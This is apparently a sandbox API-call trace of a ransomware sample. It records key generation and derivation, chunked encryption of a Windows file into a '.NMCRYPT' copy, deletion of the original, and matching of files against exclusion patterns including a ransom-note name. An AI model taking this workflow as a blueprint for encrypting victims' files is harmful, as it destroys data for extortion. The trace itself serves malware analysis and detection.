(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.817] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.818] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.819] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.819] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.819] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.819] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449a4 | out: phHash=0x1d4449a4) returned 1 [0147.819] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.819] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d4449a8 | out: phKey=0x1d4449a8*=0x9ad278) returned 1 [0147.819] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.819] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.819] wcslen (_String="\\\\?\\") returned 0x4 [0147.820] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad1f8) returned 1 [0147.820] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.820] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.820] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2568) returned 1 [0147.820] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.821] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.821] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.822] GetLastError () returned 0x0 [0147.822] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.994] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.994] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.994] GetLastError () returned 0x0 [0147.994] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.995] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.995] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.995] GetLastError () returned 0x0 [0147.995] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.995] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.995] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.995] GetLastError () returned 0x0 [0147.995] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.995] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.995] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.995] GetLastError () returned 0x0 [0147.995] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.995] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.995] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.995] GetLastError () returned 0x0 [0147.995] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.995] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.995] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.995] GetLastError () returned 0x0 [0147.995] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.995] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.995] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.995] GetLastError () returned 0x0 [0147.995] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.996] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.996] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.996] GetLastError () returned 0x0 [0147.996] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.996] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.996] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.996] GetLastError () returned 0x0 [0147.996] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.996] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x8, lpOverlapped=0x0) returned 1 [0147.996] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x8, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x10) returned 1 [0147.996] GetLastError () returned 0x0 [0147.996] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x10, lpOverlapped=0x0) returned 1 [0147.996] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.996] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml")) returned 0x20 [0147.996] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml", dwFileAttributes=0x20) returned 0 [0147.996] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml") returned 1 [0147.997] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml")) returned 0 [0147.997] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" [0147.997] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.997] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB510.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb510.tmp")) returned 0xb510 [0147.997] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB510.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb510.tmp"), dwFlags=0x1) returned 0 [0147.998] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB510.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb510.tmp")) returned 1 [0147.998] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0147.998] wcslen (_String="OK") returned 0x2 [0147.998] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.998] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.998] CryptDestroyKey (hKey=0x9ad278) returned 1 [0147.998] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0147.998] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0147.998] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*NMCRYPT") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*Recovers your files.html") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*.exe") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*.dll") returned 0 [0147.998] PathMatchSpecW (pszFile="ipssrl.xml", pszSpec="*.lnk") returned 0 [0147.998] 